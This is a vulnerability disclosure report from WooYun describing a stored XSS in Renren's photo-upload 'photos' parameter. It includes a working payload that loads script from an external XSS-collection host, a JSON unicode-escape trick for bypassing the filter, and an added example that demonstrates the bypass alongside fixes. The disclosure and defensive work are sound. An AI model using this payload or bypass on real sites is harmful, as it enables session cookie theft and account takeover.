
Vulnerability summary    Followers: 24

Defect ID: wooyun-2012-010713

Title: Stored XSS on Renren, and somehow it couldn't even hit the customer-service girl...

Vendor: Renren (人人网)

Author: imlonghao

Submitted: 2012-08-08 23:04

Fixed: 2012-09-22 23:05

Published: 2012-09-22 23:05

Type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4


Vulnerability details

Disclosure status:

2012-08-08: details sent to the vendor, awaiting vendor action
2012-08-09: vendor confirmed; details visible to the vendor only
2012-08-19: details opened to core white hats and domain experts
2012-08-29: details opened to regular white hats
2012-09-08: details opened to intern white hats
2012-09-22: details opened to the public

Brief description:

Welcome back, Renren; this hole is posted to mark the occasion!
A stored XSS in one spot: whoever views the page is hit, and the entry is synced to the feed too~~
The customer-service girl was too clever; somehow it couldn't get her...
The session cookie apparently has no HttpOnly flag, so once the cookies are stolen the account is trivially taken over~~
Looks like there might be a red envelope too? Heh...

Details:

In the album feature, upload a photo. The `photos` parameter of the upload-finish request is filtered loosely; on closer inspection apparently nothing is filtered at all, which yields a stored XSS.
On top of that the session cookie is not marked HttpOnly, so anyone who obtains the cookies can log into your Renren account at will~~
Also, the customer-service rep was clever enough not to get hit, sob...

Proof:

Test URL:

http://photo.renren.com/photo/sp/foA-BJTryEQ


Steps:
In an album, upload any photo and intercept the requests when it is published. Let the first few requests through and stop at the one to http://upload.renren.com/upload/[YOUR ID]/finish_upload/v1.0 (the upload-finish call).


The key is the photos parameter in that request~
Its value is:

%5B%7B%22code%22%3A0%2C%22msg%22%3A%22%22%2C%22filename%22%3A%22nofilename.jpg%22%2C%22filesize%22%3A814%2C%22width%22%3A292%2C%22height%22%3A250%2C%22images%22%3A%5B%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22large%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fmain_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22main%22%2C%22width%22%3A200%2C%22height%22%3A171%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Ftiny_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22tiny%22%2C%22width%22%3A50%2C%22height%22%3A50%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fhead_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22head%22%2C%22width%22%3A100%2C%22height%22%3A85%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22xlarge%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%5D%2C%22tempID%22%3A%22fileItem335152128_0%22%2C%22title%22%3A%22%22%7D%5D


Running it through decodeURIComponent gives:

[{"code":0,"msg":"","filename":"nofilename.jpg","filesize":814,"width":292,"height":250,"images":[{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"large","width":292,"height":250},{"url":"fmn061/20120808/1520/main_rEuR_1b880000eece118d.jpg","type":"main","width":200,"height":171},{"url":"fmn061/20120808/1520/tiny_rEuR_1b880000eece118d.jpg","type":"tiny","width":50,"height":50},{"url":"fmn061/20120808/1520/head_rEuR_1b880000eece118d.jpg","type":"head","width":100,"height":85},{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"xlarge","width":292,"height":250}],"tempID":"fileItem335152128_0","title":""}]


Presumably, as is common for this kind of endpoint, the filter runs on the raw parameter and nothing checks the value after the JSON string escapes have been decoded: `\uXXXX` sequences inside a JSON string are turned back into the real characters by the server's JSON parser, so a filter scanning the raw value for `<` or `>` sees neither, while the stored URL ends up containing both.
So we rewrite the JS payload as JSON `\u` escapes.

"><script src=http://xsser.me/pIQKKz></script>


\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e


Append the escaped payload to the end of the first image URL:

[{"code":0,"msg":"","filename":"nofilename.jpg","filesize":814,"width":292,"height":250,"images":[{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e","type":"large","width":292,"height":250},{"url":"fmn061/20120808/1520/main_rEuR_1b880000eece118d.jpg","type":"main","width":200,"height":171},{"url":"fmn061/20120808/1520/tiny_rEuR_1b880000eece118d.jpg","type":"tiny","width":50,"height":50},{"url":"fmn061/20120808/1520/head_rEuR_1b880000eece118d.jpg","type":"head","width":100,"height":85},{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"xlarge","width":292,"height":250}],"tempID":"fileItem335152128_0","title":""}]


Then run the result through encodeURIComponent again.
Replace the photos parameter of the intercepted request in Fiddler with this value:

%5B%7B%22code%22%3A0%2C%22msg%22%3A%22%22%2C%22filename%22%3A%22nofilename.jpg%22%2C%22filesize%22%3A814%2C%22width%22%3A292%2C%22height%22%3A250%2C%22images%22%3A%5B%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%5Cu0022%5Cu003e%5Cu003c%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003e%5Cu003c%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003e%22%2C%22type%22%3A%22large%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fmain_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22main%22%2C%22width%22%3A200%2C%22height%22%3A171%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Ftiny_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22tiny%22%2C%22width%22%3A50%2C%22height%22%3A50%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fhead_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22head%22%2C%22width%22%3A100%2C%22height%22%3A85%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22xlarge%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%5D%2C%22tempID%22%3A%22fileItem335152128_0%22%2C%22title%22%3A%22%22%7D%5D


(Screenshot in the original report.)
Now open the photo page and view the source: the script fires, XSSed.


The entry is also synced to the feed (新鲜事).


Looking at the feed's source, the JS link is there as well, but it doesn't seem to execute... -_-||
Does the feed restrict JS execution?
No big deal, though: other users who see such a bizarre bit of code in the feed will surely click it...
One click and they're hit~~

Fix suggestions:

Validate the input in the photos parameter after JSON decoding, not before~
Restrict image URLs to an allowlist of path characters (the legitimate URLs in the capture use only letters, digits, `_`, `/` and `.`), and HTML-encode the URL when it is rendered into the page.
And why not set HttpOnly on the session cookie? That blocks cookie theft via document.cookie, though it does not remove the XSS itself.
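The following is an added example, not code from the original report or from Renren. It reproduces the mechanism shown in the proof on a constructed copy of the photos parameter (the JSON structure and the payload are the ones from the capture above) and pairs it with the two checks the fix suggestions ask for. The naive pre-parse filter, the allowlist validator and the attribute encoder are hypothetical; the real Renren server code is not known.

```javascript
// Added example, not code from the original report or from Renren.
// Shows why JSON \uXXXX escapes hide '<' and '>' from a filter that scans the
// raw photos parameter, and a hardened validate-after-parse plus output-encode
// alternative. The filter and validator below are hypothetical.

const BENIGN_URL = 'fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg';
const PAYLOAD = '"><script src=http://xsser.me/pIQKKz></script>';

// Escape every character as a JSON \uXXXX sequence, as the report does.
function toJsonUnicodeEscapes(s) {
  return Array.from(s, ch =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')).join('');
}

// Build the JSON text of the photos array with urlText spliced in verbatim,
// the way the captured request was edited in Fiddler. JSON.stringify is
// deliberately not used: it would double the backslashes and the escapes
// would survive parsing as literal text instead of being decoded.
function buildPhotosJson(urlText) {
  return '[{"code":0,"msg":"","filename":"nofilename.jpg","filesize":814,'
    + '"width":292,"height":250,"images":[{"url":"' + urlText + '",'
    + '"type":"large","width":292,"height":250}],'
    + '"tempID":"fileItem335152128_0","title":""}]';
}

// Hypothetical server-side filter that scans the raw (URI-decoded) parameter
// for tag characters before JSON parsing. It never sees the payload.
function naiveFilterRejects(rawParam) {
  return /[<>]/.test(rawParam);
}

// What the server actually stores after JSON.parse: the escapes are gone.
function decodedUrls(rawParam) {
  const urls = [];
  for (const photo of JSON.parse(rawParam)) {
    for (const img of photo.images) urls.push(img.url);
  }
  return urls;
}

// Hardened check: parse first, then allowlist each decoded url. The pattern is
// derived from the legitimate URLs in the capture (letters, digits, '_', '/'
// between segments, an image extension); "letters and '.' only" would reject
// the site's own URLs.
const SAFE_IMAGE_PATH = /^[A-Za-z0-9_]+(?:\/[A-Za-z0-9_]+)*\.(?:jpg|jpeg|png|gif)$/;

function validatePhotos(rawParam) {
  let photos;
  try { photos = JSON.parse(rawParam); } catch (e) { return { ok: false, reason: 'invalid JSON' }; }
  if (!Array.isArray(photos)) return { ok: false, reason: 'not an array' };
  for (const photo of photos) {
    if (!Array.isArray(photo.images)) return { ok: false, reason: 'images missing' };
    for (const img of photo.images) {
      if (typeof img.url !== 'string' || !SAFE_IMAGE_PATH.test(img.url)) {
        return { ok: false, reason: 'bad url: ' + img.url };
      }
    }
  }
  return { ok: true };
}

// Second line of defence: attribute-encode the url when rendering, so even a
// stored payload cannot break out of the src attribute.
function escapeHtmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function renderImgTag(url) {
  return '<img src="' + escapeHtmlAttr(url) + '">';
}

// End-to-end: the parameter as the upload client would send it, then the
// verdict of each check on it.
function demo() {
  const escapedPayload = toJsonUnicodeEscapes(PAYLOAD);
  const photosParam = encodeURIComponent(buildPhotosJson(BENIGN_URL + escapedPayload));
  const raw = decodeURIComponent(photosParam);
  const storedUrl = decodedUrls(raw)[0];
  return {
    naiveRejects: naiveFilterRejects(raw),   // false: no '<' or '>' in the raw text
    storedUrl,                               // BENIGN_URL followed by the script tag
    hardenedOk: validatePhotos(raw).ok,      // false: rejected after parsing
    rendered: renderImgTag(storedUrl),       // payload stays inert inside the attribute
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The order of operations is the whole point: any check that runs before the JSON parser operates on a different string than the one that gets stored, so validation has to happen on the parsed value, and output encoding catches whatever validation misses.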

Copyright: please credit imlonghao@WooYun when reposting


Vendor response

Vendor reply:

Severity: High

Rank: 10

Confirmed: 2012-08-09 19:00

Vendor comment:

Many thanks!

Latest status:

None


Vulnerability rating:

Comments

  1. 2012-08-09 06:43 | 风萧萧 verified white hat ( core white hat | Rank:1020 vulnerabilities:76 | Everyone has to seriously fall in love with someone once in a lifetime)

    Cute girl.

  2. 2012-08-09 09:32 | 水滴 ( regular white hat | Rank:146 vulnerabilities:24 )

  3. 2012-08-09 13:52 | se55i0n ( regular white hat | Rank:1567 vulnerabilities:173 )

    The girl steals the show~~

  4. 2012-08-09 14:05 | c4bbage ( passer-by | Rank:15 vulnerabilities:7 | var_dump($me);)

    Hunting girls, hunting holes.

  5. 2012-08-09 18:26 | xixi ( passer-by | Rank:26 vulnerabilities:8 | Stop talking nonsense..........)

    Following

  6. 2013-03-23 22:47 | px1624 ( regular white hat | Rank:1036 vulnerabilities:175 | px1624)

    Probably no real reply; the system answered automatically...